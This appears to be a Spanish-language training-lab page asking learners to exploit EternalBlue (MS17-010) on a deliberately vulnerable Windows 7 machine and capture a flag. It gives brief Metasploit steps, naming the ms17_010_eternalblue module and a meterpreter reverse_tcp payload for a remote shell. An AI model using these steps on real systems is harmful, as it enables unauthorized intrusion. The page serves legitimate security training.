Dificultad
intermediate
Duración promedio
2 hrs
Tecnologías
windows
red team
owasp-a05-security-misconfiguration
smb
metasploit
Dificultad
intermediate
Duración promedio
2 hrs
Tecnologías
windows
red team
owasp-a05-security-misconfiguration
smb
metasploit
En este laboratorio deberás analizar un sistema Windows 7 vulnerable al famoso exploit EternalBlue, utilizado históricamente en ataques reales. Tu objetivo será explotar la vulnerabilidad, acceder remotamente al sistema y obtener una flag desde el escritorio del usuario.
En este laboratorio aprenderás:
nmap
y Metasploit
ms17_010_eternalblue
Sigue las siguientes instrucciones para comenzar:
Estás frente a un sistema Windows vulnerable. Tu tarea es explotar la vulnerabilidad EternalBlue (MS17-010) para obtener una shell remota y encontrar la flag.
Descubre la dirección IP de la máquina Windows.
nmap
, netdiscover
o arp-scan
para identificar su IP en la red.Escanea los puertos y busca servicios vulnerables.
Lanza el exploit con Metasploit.
use exploit/windows/smb/ms17_010_eternalblue
RHOSTS
, LHOST
y selecciona un payload como windows/x64/meterpreter/reverse_tcp
.Accede al sistema.
Lee la flag.: La flag debe estar en un archivo .txt
.
Recuerda: este tipo de vulnerabilidades cambió la historia de la ciberseguridad. ¡Aprovéchala con responsabilidad!
¡Feliz hackeo!
Dificultad
intermediate
Duración promedio
2 hrs
Tecnologías
windows
red team
owasp-a05-security-misconfiguration
smb
metasploit
Dificultad
intermediate
Duración promedio
2 hrs
Tecnologías
windows
red team
owasp-a05-security-misconfiguration
smb
metasploit